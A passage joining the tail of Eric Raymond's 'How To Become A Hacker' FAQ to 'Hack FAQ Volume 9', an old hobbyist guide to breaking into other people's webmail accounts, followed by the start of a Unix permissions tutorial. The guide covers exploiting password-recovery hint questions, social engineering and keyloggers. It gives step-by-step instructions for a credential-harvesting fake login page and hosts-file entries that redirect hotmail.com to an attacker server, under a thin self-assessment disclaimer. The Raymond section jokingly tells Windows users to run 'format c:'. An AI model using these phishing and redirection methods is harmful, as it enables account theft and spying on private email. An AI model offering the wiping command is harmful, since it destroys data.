thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available. Maintainers of major technical FAQs get almost as much respect as open-source authors. 4. Help keep the infrastructure working The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards. People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication. 5. Serve the hacker culture itself Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things. The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status. The Hacker/Nerd Connection Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you stay concentrated on the really important things, like thinking and hacking. For this reason, many hackers have adopted the label ‘nerd’ and even use the harsher term ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations. See The Geek Page for extensive discussion. If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material. If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on. Points For Style Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking. Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers. Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers). Study Zen, and/or take up martial arts. (The mental discipline seems similar in important ways.) Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing. Develop your appreciation of puns and wordplay. The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice. Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it. Finally, a few things not to do. Don't use a silly, grandiose user ID or screen name. Don't get in flame wars on Usenet (or anywhere else). Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does. Don't post or email writing that's full of spelling errors and bad grammar. The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted. The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser. Other Resources Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers. If Peter's site doesn't respond, the following Excite search should find a copy. There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team. I have also written A Brief History Of Hackerdom. I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere. Rick Moen has written an excellent document on how to run a Linux user group. Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it. If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO. When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO. If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo. Frequently Asked Questions Q: Will you teach me how to hack? Q: How can I get started, then? Q: When do you have to start? Is it too late for me to learn? Q: How long will it take me to learn to hack? Q: Are Visual Basic or C# good languages to start with? Q: Would you help me to crack a system, or teach me how to crack? Q: How can I get the password for someone else's account? Q: How can I break into/read/monitor someone else's email? Q: How can I steal channel op privileges on IRC? Q: I've been cracked. Will you help me fend off further attacks? Q: I'm having problems with my Windows software. Will you help me? Q: Where can I find some real hackers to talk with? Q: Can you recommend useful books about hacking-related subjects? Q: Do I need to be good at math to become a hacker? Q: What language should I learn first? Q: What kind of hardware do I need? Q: I want to contribute. Can you help me pick a problem to work on? Q: Do I need to hate and bash Microsoft? Q: But won't open-source software leave programmers unable to make a living? Q: How can I get started? Where can I get a free Unix? Q: Will you teach me how to hack? A: Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and traveling as an open-source advocate, take up 110% of my time. Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know. Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions. If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery. Q: How can I get started, then? A: The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started. Q: When do you have to start? Is it too late for me to learn? A: Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions. Q: How long will it take me to learn to hack? A: That depends on how talented you are and how hard you work at it. Most people can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; if you are a real hacker, you will spend the rest of your life learning and perfecting your craft. Q: Are Visual Basic or C# good languages to start with? A: If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. Don't go there. It's ugly, and it never stops being ugly. There are specific problems with Visual Basic and C#; mainly that they're not portable. Though there are prototype open-source implementations of these languages, the applicable ECMA standards don't cover more than a small set of their programming interfaces. On Windows most of their library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use — more careful than any newbie is really capable of being — you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available. Visual Basic is especially awful. Like other Basics it's a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead. One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in. Q: Would you help me to crack a system, or teach me how to crack? A: No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness. Q: How can I get the password for someone else's account? A: This is cracking. Go away, idiot. Q: How can I break into/read/monitor someone else's email? A: This is cracking. Get lost, moron. Q: How can I steal channel op privileges on IRC? A: This is cracking. Begone, cretin. Q: I've been cracked. Will you help me fend off further attacks? A: No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security. Q: I'm having problems with my Windows software. Will you help me? A: Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes. Q: Where can I find some real hackers to talk with? A: The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio). (I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.) Q: Can you recommend useful books about hacking-related subjects? A: I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting. For an introduction to Python, see the introductory materials on the Python site. Q: Do I need to be good at math to become a hacker? A: No. While you do need to be able to think logically and follow chains of exact reasoning, hacking uses very little formal mathematics or arithmetic. In particular, you won't need trigonometry, calculus or analysis (we leave that stuff to the electrical engineers :-)). Some grounding in finite mathematics (including Boolean algebra, finite-set theory, combinatorics, and graph theory) can be helpful. Q: What language should I learn first? A: XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide. But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed. C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first. Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid. Q: What kind of hardware do I need? A: It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true some time ago; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough. The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for most modern machines. The only real sticky area is modems; some machines have Windows-specific hardware that won't work with Linux. There's a FAQ on hardware compatibility; the latest version is here. Q: I want to contribute. Can you help me pick a problem to work on? A: No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works. Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think "Cool! I'd like to work on that!", join it. Q: Do I need to hate and bash Microsoft? A: No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma. Q: But won't open-source software leave programmers unable to make a living? A: This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages. Q: How can I get started? Where can I get a free Unix? A: Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...
________________________________________________________________________Hack FAQ Volume 9 credited to Wang Frequently asked questions about hacking and computers Whoa...volume 9 - how did things get this far? lol. I wrote volume 1 as a one off just to get the things that I knew off my chest - and now we are 9 volumes in...can't be a bad thing! Ok, since the last volume I have been busy with real life and Mod-X (which has become really popular/busy now). I also decided to cover a certain topic this volume - hotmail and web based email. Lol, finally broke me down. 60% of the reports through the hack faq question form as to do with hacking hotmail or web based email related questions. Sad thing is, most people out there seem to think I have an instant password decrypter for them or something - which, as you will read, is not the case! Ah well, its covered now...so hopefully I can ignore people who ask those questions now :) Anyhow, enough of my poor excuses :) - enjoy the volume and please keep requests topics to be covered. One thing though - when you use the request topic form on the site - please actually submit a topic to be covered! I get too many "Please tell me how to break into this" email messages. Ideally I want emails through like "Please could you do a topic covering this:"...as opposed to people just out for me to solve their personal problems :) If you have any topics you want covering, please email me at wang@most-wanted.com and I will consider putting them into the next volume, or you can fill in my online question form on the site. If you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously). If you want to join our mailing list and be notified as soon as a new Hack FAQ is released, you can sign up by clicking here -------------------------------------------------------------------------------- Jump to a topic: Hacking Web-based Email Unix Ownership/Permissions explained What are SUID Binaries and why are they dangerous? Decrypting Trillian Passwords What is Cross Site Scripting (css/xss) ? Problems with user input in scripting languages using databases (SQL statements) Emails -------------------------------------------------------------------------------- Hacking Web-based Email Oh boy...I knew we would have to cover this at some stage :) - just having the words "hacking web-based email" on the site will bring the server loads more hits...why? because there is something about reading another persons email that fascinates hackers/husbands/wifes/boyfriends/girlfriends/students etc etc. I will also take this opportunity to state that the information here is intended for use by you, to judge the security of your own web-based email account - and hopefully fix any blatant mistakes you have made during signing up for web-based email. This is not intended to be used to break into accounts that you don't own. What exactly is web-based email though? is it the email you get through Outlook Express or your preferred mail client? No. Web-based email is the name associated with sites like hotmail.com, mail.yahoo.com, another.com, email.excite.com etc etc. They are all sites which provide you with your own email address, and allow you to check your email and send emails by logging into their site and doing all your email tasks via your web browser. They are extremely popular with most internet users, simply because of their ease of use, and ease of access. When you use an actual email application from your pc (such as Outlook, Outlook express, Eudora, Netscape Mail etc) you are usually dealing with POP3 email (which is accessed by your mail application connecting to the pop3 daemon of a mail server, usually via port 110). POP3 email is not what we are dealing with today - we are merely interested in the web-based email services that you access via your web browser. "How do I hack web-based email" must be the most frequently asked question by aspiring hackers - a lot of us have asked someone that very question in the past...and usually met with a bad response. Why is it so commonly asked? At a guess...it's because web-based email is, for a lot of people, the only thing they use the internet for. It's easy to use, quick to setup, and more importantly...most people you know also have accounts at some web-based service on the net. And that is the real reason...most people simply get a thrill out of the idea that they might be able to "spy" on people they know. Like the world's fascination with fly-on-the-wall television programs...reading someone's email is interesting, it's an invasion of privacy - and more importantly, you can see private exchanges of information between people. However, I am babbling on - you already know all this...which is why you want to know HOW it's done...not why. It's likely that you are already aware of most hackers views of the question "how do I hack hotmail?" - and some of you may be mystified as to why they either flame you back (i.e. send abuse back to you), kick you from a chat room, or make fun of you. Why? you asked a perfectly good question right? - and yes, you did...it's just that it seems this subject scares a lot of people, because despite how good they think they are...they don't know the answer to your question. There is another reason though - the question is also ignorant. A lot of people who send me the question via the hack faq form on the site expect there to be a simple, almost magic (lol) method to get into web based email...they seem to almost expect a reply from me to say "oh yeah, just type this into that box and you will be into their account, no problem". This of course, could not be further from the truth. The simple fact is - there is no magic way to get into everyone's web-based email. There is no secret technique, or super-program that breaks into all hotmail accounts - it's done on a case-by-case basis...and a lot of it is luck. The chances are, what I will cover today will not get you into your friends email account (I am quite glad that is the case!) - but on the other hand, it just might. There are 4 or 5 clear techniques that hackers use to eventually gain access to a targets email account. I will cover each one of them individually: Technique 1 - Lost Password Requests Wow, lost password requests! what a great idea! With so many users signing up, then forgetting their passwords the next day something needed to be implemented to ensure user's had a way of being given/remembering their lost passwords. There are a few different methods that various email services use to handle this type of situation: Send over email - Some email services require you to already have another email account elsewhere, like a POP3 account with your isp or similar. If you forget your password to access their web-based email service - they will then send the forgotten password to your other email account. Seems like a good idea...but how effective is it? Imagine a hacker gained access to your POP3 account - they could then request the lost password from your web-based email account (and probably a lot of other services you are signed up to) - and just from knowing the POP3 password, suddenly have access to everything. You also have to remember that they are sending your full password out via email! unencrypted...for anyone who hijacks the email to see. What if the 2nd email account you gave the web-based email company when you signed up becomes inaccessible at a later date? you are stuck without being able to request your lost password to a place where you can read it. Some services, won't even let you change that initial 2nd email you signed up with too :( My main problem with this technique is the whole string of security problems that arises if a hacker gains access to one of your email addresses, and can then request lost passwords from other accounts you have, to that email. As a result of this - I will rate this technique: Security 2/5 Practicality 4/5. Hint Questions (full recovery) - Some services decide to ask you 1 or more questions when you sign up, such as "What is your mother's maiden name" etc - questions they think that only you will know the answer to. Some web-based services that use this technique are poorer than others, for example - some have predefined questions, like you will be asked "What is your mother's maiden name" - and that's it, you have no choice. This is a bad thing since you might be thinking "arghh!! tons of people know the maiden name...please ask me something else!". Some are better, and let you choose from a range of questions, which one you want to answer. This is good because you then at least get the choice...although some of the questions can be so poor that you would be better off just giving your password out freely! Lastly, the best versions of this technique let you actually enter your own question, and your own answer. These are great, since you can pick something that absolutely no-one else will know. So, what are the downsides to this...well, let's be honest - you selected your own password, and you forget it...so what's to say you aren't going to forget your hint question's answer too! I know people that have done this. Also, your hint question is only as strong as you make it. Some questions I have seen have been pathetic (ones like "What is your date of birth") - and unless you lie...you know someone in the world is going to know it. However, this does create another issue - you can simply lie about the answer to the question...that way, providing you remember your lie, no-one else should know the answer to the question, even if they think they do. As you can see, this technique really depends on you, and more importantly the flexibility the web-based email services provides over the hint question. The reason I label this "(full recovery)" is because I am referring to the version of this technique, whereby you enter your hint answer correctly - and the email service presents you with a message telling you your lost password. In my opinion...this is bad, because say an attacker went through the lost password process, got the answer right, and then was presented with the password - you now both have access to the service, and the attacker can read your mail whenever he/she wants...without you being any the wiser. As a result of this, I will rate this technique: Security 2/5 Practicality 3/5. Hint Questions (Reset) - Same as above, but when you get the hint question right - it doesn't tell you the password you had forgotten...but instead resets the password to a completely new, random password. This may not seem that good, and may seem a bit of a pain - but when you think about it...at least you know when someone has broken into your email. You would try to log in, and realise your password had changed...you could then inform all of your associates/friends/family that your email seems to have been broken into...and they can stop mailing that address (or wait for you to sort the issue out). It's not great...but at least you know you aren't being spied on. As a result of this, I will rate this technique: Security 3/5 Practicality 2/5. Password Reset - What can I say - terrible. You forget your password, click "lost password" - and it simply changes your password to a new one. I can't believe anyone would ever use this...but I have seen it in operation :( In practise, it means that you know when you have been broken into...but, it means that feasibly...anyone can break into you and prevent you from reading your email. I did see another variation of this where it emailed your 2nd account (that you gave the web-based email service when you signed up) saying "unless you visit this enclosed link - your password will be reset in 48 hours". That was...better...I guess, but still awful. The only thing this technique has going for it is that a hacker may be reluctant to reset your password so you can't get in - because they know it's a clear sign that they have been there. I will rate this technique: Security 1/5 Practicality 1/5. Create a new account - defeats the point of a lost password facility - but security wise...it's the best. If you forget your password, you have to create a new account. Inconvenient - yes! but, perhaps it will make you think more carefully before selecting a password you can't remember ;) I will rate this technique: Security 5/5 Practicality 1/5. Ok...now you know the most common forms of lost password systems - let's talk about why they are useful to a hacker trying to break into an account on a web-based email service. On visiting the web-based email site, a hacker would first look for a lost password link. Sometimes it's there, linked to straight away - and sometimes you need to submit one or more incorrect login attempts first, in order to be given the link. Firstly, the hacker will look at what kind of lost password technique is in use on the site (from the techniques explained above). Try it out...and see what it does when you tell them you have lost your password (remember that the majority of sites will log your IP address when you request a lost password, and maybe even send your IP to the real owner of the account via email or similar). If it sends it via email to a separate address (technique 1 explained above) - then does it tell you which email address it has been sent to? or does it just say "your password has been emailed to your address on record" ? If it tells you the email it has been sent to - this is bad for the real account owner...since the hacker then knows exactly which other email address of yours they need to break into (and remember it might be another email of yours they already have access to). If it's the hint question technique - see what the question is - you wouldn't believe how many I have looked at only to see the question "what is your favourite colour?" - that's terrible, guessable within about 3 attempts. If it's a more personal question, like the "when is your birthday?", or "what is your postcode?", or "what is your mother's maiden name?" then the hacker will undoubtedly try to social engineer the information out of you. Social engineering is another topic altogether - but just so you know, social engineering is when someone tries to trick another person into revealing the information they want. For example, to get the person's birth date I need to get into their web email - I might track them down on IRC and talk to them for ages, make friends etc....and someone along the lines, slip in the question asking when their birthday is. It is *unbelievable* how easy social engineering is sometimes, and there are zillions of techniques people use - ranging from the simple one I just described, to setting up false web sites etc to catch people's details...no joke. The other issue is, if it's a friend/colleague trying to get into your email - the chances are they already know a lot of your personal information - be careful. In general, people say passwords are the weakest link in the security chain - but lost password techniques are often the key to gaining access. Technique 2 - Social Engineering As I stated above - social engineering is when someone tries to trick another person into revealing the information they want. The most common "hacker" social engineering is when someone talks to you about hobbies/pets/family etc...in the hope that by knowing your pets names etc, they might be able to get into your accounts (if you used your pets name as a password). You wouldn't believe how effective this is. There are varying levels of social engineering - but if can go as far people setting up fake websites and emailing you to tell you about a brilliant new web site you need to sign up to ;) - then when you do, they catch all your details they need etc. It can also end up with people phoning you, pretending to be from a company doing a survey. Social engineering is an old form of hacking, which hasn't dated (human stupidity keeps it alive) - and you can even see it in Hollywood films such as "Hackers", and "Takedown". Social engineering to just get a password is a bit hit and miss - because you don't really know what information you need to get out of the target. However, when combining social engineering with a lost password form that has a "hint question" - you know exactly what information you need to get out of the target person (you just have to hope they haven't lied when they answered their hint question!). Technique 3 - Site flaws Earlier, I said that there was no magic way to get into everyone's email. This isn't entirely true. From time to time (like with any site/server on the web) - flaws arise. When it comes down to it, the web-based email web site has to be hosted on a web server somewhere...which is likely to be either IIS 4/5 (the Windows NT/2000 web server) or Apache (mostly *nix, but also runs on a lot of Windows systems on the net). As a lot of you will know, IIS flaws aren't exactly rare ;) - and Apache has major scares every now and then too (some bad ones recently). When an exploit in the server appears on a popular security site in the form of an advisory, there will be a gap before the server running the web-based email is patched. Hotmail etc - will be patched almost instantly...giving you no chance. However - there are a lot of web-based email providers that are slacking...and leave themselves open to you to not only hack 1 account...but the whole server, and all accounts :( - awful really. Aside from server flaws - there are the inevitable script flaws. Hotmail has had it's fair share of them, as have all web-based email providers. The problem is - providers like hotmail have learnt the hard way, they had lots of flaws (silly ones) early on, and are now...shockingly...pretty secure. If you want to look over the kinds of flaws that were present, trying searching some security sites for "hotmail javascript" or similar - you will see some details on an old hotmail flaw that meant a person's hotmail session could be hijacked if a malicious user sent the account an email with some malicious javascript code in. No system is ever 100% secure - and I promise you, hotmail (and all the other sites) will have more security flaws as bad as this in the future...it's just a case of how fast you can find out about it and use it to your advantage. Hotmail, for example, usually patch the flaw within hours :( - so this isn't exactly a concrete solution to breaking into accounts. Excite mail recently had a php session flaw to which could lead to account hijacking...it just shows that these flaws are still there waiting to be found. Technique 4 - Trick Emails This is pretty lame...but human stupidity sometimes leads it to work. A lot of attackers simply sign up for email addresses like "lost_password@hotmail.com" or "administrator@excite.com" etc - anything they can think of that makes them look like a member of staff from the site. They will then email you trying to trick you into giving them your password for some reason, or trick you into going to some site somewhere and giving out your password etc. Email providers shouldn't ever need to ask your for your password - bear that in mind. Technique 5 - Software flaws Knowing someone's password is only one way of getting into someone's account. When they log in, the site knows they are logged in by checking their cookie or session data (depending on how the login works since some sites will only store user info in cookies if select to do so, like with a "remember my password" checkbox or similar). So, if an attacker steals your cookies/session information - they can walk into your inbox. I doubt I need to tell you how many Internet Explorer flaws there are coming out every month (that's not to say that other browsers such as Netscape/Mozilla/Opera aren't having their fair share too...just not as many!). A lot of the flaws allow the attacker to execute code of his/her choice on your system, or steal information/data. So another option would be for an attacker to try and exploit the account owner in another way first. They might send you an email asking you to go to another web site - and then when you do, the page attempts the exploit on you. This is fairly common. I won't go into information gathering here - but someone with their own web site could also (to a certain extent) determine your IP address, what browser/OS/mail program you are using, just by getting you to go to their own site. They will then know what exploits to try on you, if your not clever and not patched. Cross site scripting (css/xss) is also a common cause of cookie's being stolen, and sessions being hijacked - but we have a whole topic dedicated to that this volume, so I won't explain it here. Therefore staying on top of security flaws in software you use is another way to avoid getting your email hacked (sign up for the weekly security newsletter at net-security.org). The point is, stealing cookie's/session data via software flaws is also a common way to get into web-based email. Technique 6 - Trojans/Keyloggers This technique is closely linked with the last technique, since a trojan/keylogging program would often be installed on you without you knowing, via an exploit in your browser/mail program etc. However, a lot of people are simply dumb and run all executable attachments from emails they receive ;( When someone has you trojan'd or a keylogger on your pc, they just have to wait until you send the relevant password data from your web-based email login to them. Technique 7 - Fake web sites I sometimes also see this referred to as "Password Harvesting". This technique involves you having your own web space somewhere - hopefully somewhere which isn't too obvious such as geocities or somewhere (this works best if you buy your own domain/hosting that looks authentic, for example email-login.com or something). You then copy the html for the login page of the email provider that your target uses (i.e. copy the hotmail.com login page to your hard drive for editing). Then, the attacker modifies the login page, so that it submits information to his own scripts on his site, before probably redirecting you to the real web-based email site. Got the idea yet? yes...you fool the account owner into logging into your "fake" login screen on your server, it logs his/her details, then sends him to the real site - where he probably logs in again thinking the login just failed the first time (but we know differently) - and that's it...the login will succeed for them the second time on the real site...and they are non the wiser. There are a few ways this can be made more authentic. Firstly, as I mentioned - the site with the fake login screen should be a believable URL (since this technique relies on you fooling the account owner into thinking it's ok to log into his email from your site). If you register a domain like email-login.com or something...it might work, for example. It can also be made more realistic with a few small touches - like for example, when they submit to the form on the "fake" site - you send them to the "wrong password" screen, on the real server...so it looks like an authentic bad login. It's also sometimes possible to actually make a real request to the real server with the information they entered on the fake site, so that the login succeeds on the real site! That's the best way, since they then have no clue as to what has happened. This is an extremely dangerous technique, it relies on user stupidity and requires you to somehow fool them into logging in through your fake site...but it often works. User stupidity prevails ;) Technique 8 - Hosts hack/trick Firstly, what is the Windows host file? "The short answer is that the Hosts file is like an address book. When you type an address like www.yahoo.com into your browser, the Hosts file is consulted to see if you have the IP address for that site. If you do, then your computer will use that IP and the site will open. If not, your computer will ask your ISP's (internet service provider) computer for the IP before it can access that site. Most of the time, you do not have addresses in your "address book," because you have not put any there. Therefore, most of the time your computer asks for the IP address from your ISP to find sites." The hosts file is located in "c:windowshosts" for Windows 9x/ME systems, and in "c:winntsystem32driversetchosts" for Windows NT/2000/XP systems (if it doesn't exist you can create it, but it should exist) - open it in notepad. It's not uncommon for the file to be blank, but typically it may look something like: 127.0.0.1 localhost 212.38.191.83 www.mod-x.co.uk So, as you can see the format is: Can you see where this one is going? ;) - this technique should be used in conjunction with the previous technique. This is the key to the problem of fooling someone into going to your "fake" site, instead of the real web-based email login. Let's say I set up my fake hotmail login page on my www.mod-x.co.uk server, who's IP is 212.38.191.83 - if there was an entry in my targets host file that read: 212.38.191.83 hotmail.com 212.38.191.83 www.hotmail.com When they go to their web browser and type "www.hotmail.com" - they will be taken to my server instead of hotmail! and hence, to the fake login. This is considered quite a lame thing to do - but frankly, it's requires more skill and understanding than brute forcing. The problem you may have noticed is - you need to somehow get that entry into your target's host file...not an easy task :( - if you have physical access to their PC, then you can slip it in there when they aren't about...but otherwise, you would need to trick/exploit them to get that in there (you would probably need to work out how to remove it at a later date to, to avoid getting detected after it has served it's purpose). Another side note I should mention is - I believe a Windows machine needs a reboot before the hosts file's changes come into effect. The good thing about this technique, is that *nix systems also use host files in the same way (except it's located at /etc/hosts). It has a slightly different format to a windows hosts file, but it's very similar. An example file would be 212.38.191.83 hotmail.com 212.38.191.83 www.hotmail.com Please note, that is the IP, followed by 2 tabs (not spaces!) then the alias. There is actually more stuff you can put in the hosts file, like hostname and other aliases...but I won't go into that here, since we have all we need. Technique 9 - Brute Forcing Don't even bother with this one, just thought I would mention it. Brute forcing involves trying lots and lots of possible passwords on the web-based email login to try and get the correct password. Today, most half-decent sites will have some sort of IDS (intrusion detection system) to detect the brute force...and perhaps even auto-notify your ISP, or just simply ban you from the site. Apart from brute forcing being skill-less, probably taking ages, there is a high risk of being caught since lots of attempt/hits to a site really show up in server logs. A number of the programs out there that claim to be stealthy brute force applications really don't work that well either. There really isn't a great deal more you can say on hacking web-based email - without going into detail specifically on one web-based email site, and it's authentication methods etc - or describing one exploit in detail. Hopefully, this has given you a general overview of how web-based email is hacked, and how to defend your own accounts (and made it clear that there isn't exactly a 100% guaranteed method of gaining access). Comments welcome ;) -------------------------------------------------------------------------------- Unix Ownership/Permissions explained Ok, we really need to cover this in order to do a few other topics in the future, so best to get this out of the way - sorry for all those that already know all of what I am about to say! If you don't know, or have never used *nix style operating systems, and are purely a Windows, Mac, BeOS (or whatever!) user - then I would urge you to take the time to get a shell account on a *nix system somewhere (telnet to sdf.lonestar.org on port 23, they provide basic free shell accounts) and to play with the information I am giving you, rather than just disregarding it. First, we will need to talk about basic unix system privileges. On *nix operating systems, such as Linux, FreeBSD, Solaris (just to name a few), access to files is controlled by the file mode setting of a file. The mode specifies who (user/owner, group, other) can have access to a file and what type of access (read, write, execute) to the file is allowed. The "User" is the owner of the file (and I will refer to the User as Owner from now on), the "Group" is a particular group of users that the file belongs to, and "Other" corresponds to everyone that is not the User or a member of the Group. For any given ownership relation, we need three bits to specify access permissions: the first to denote read (r) access, the second to denote write (w) access and the third to denote execute (x) access. Therefore, an easy way to denote the access that the Owner has to a file would be "rwx" (which means the Owner has Read, Write, and eXecute access to the particular file). So - how would we denote access if say, the Owner had read access, and execute access - but no write access? Simple, we use a dash to denote that they don't have write access as so "r-x". Simple! Now, we have three ownership issues of a file to cover remember - 'owner' permissions, 'group' permissions and 'all' permissions - so we need a "rwx" triplet for each, resulting in nine bits. As an example - lets say that Owner, Group, and All (everyone) has access to Read, Write, and Execute a particular file - we denote this as: rwxrwxrwx Just to make this clearer...a breakdown of that would be: Owner Group All (Everyone) Read Write Execute Read Write Execute Read Write Execute r w x r w x r w x Another example, lets say that the Owner has full access to a file - but Group and All can only read the file. How do we denote this? Like so: Owner Group All (Everyone) Read Write Execute Read Write Execute Read Write Execute r w x r - - r - - So our end string is "rwxr--r--". Make sense? I hope so! if not, re-read now! Ok - so now, lets say you have your unix shell account open in a telnet window - or you are sitting there at a *nix terminal somewhere - how do you find out the permissions/ownership that a specific file or directory has? We use the "ls" command. For those that don't know, ls is basically the equivalent to you typing "dir" from a dos prompt...except ls has some nicer options. So, here is an example of me typing ls: [wang@server mydirectory]# ls myfile.php index.htm anotherdir Ok...so that got me a listing of the files in the current directory I was in - but I don't see anything to tell me the permissions on each file/directory in there. To get this information, we have to use ls with an extra parameter "ls -l" - which tells it to show us a long listing, like so: [wang@server mydirectory]# ls -l total 6 -rw-r--r-- 1 wang wheel 872 Apr 25 16:26 myfile.php -rw-r--r-- 1 wang wheel 680 Apr 25 16:26 index.htm drwxr-xr-x 2 wang wheel 512 Apr 3 13:40 anotherdir ah! thats more like it. Ok, immediately you will notice that it shows one file/directory per line - along with the permissions of that file/directory, it's owner's username, the group name, the size, the date/time, and the file/dir name. You will also notice something different about the permissions - two of them have a "-" in front of the normal permissions system I explained, and one has a "d" in front. This is easy - this is the way we tell what is a directory and what isn't - if it has a "d" in front of the 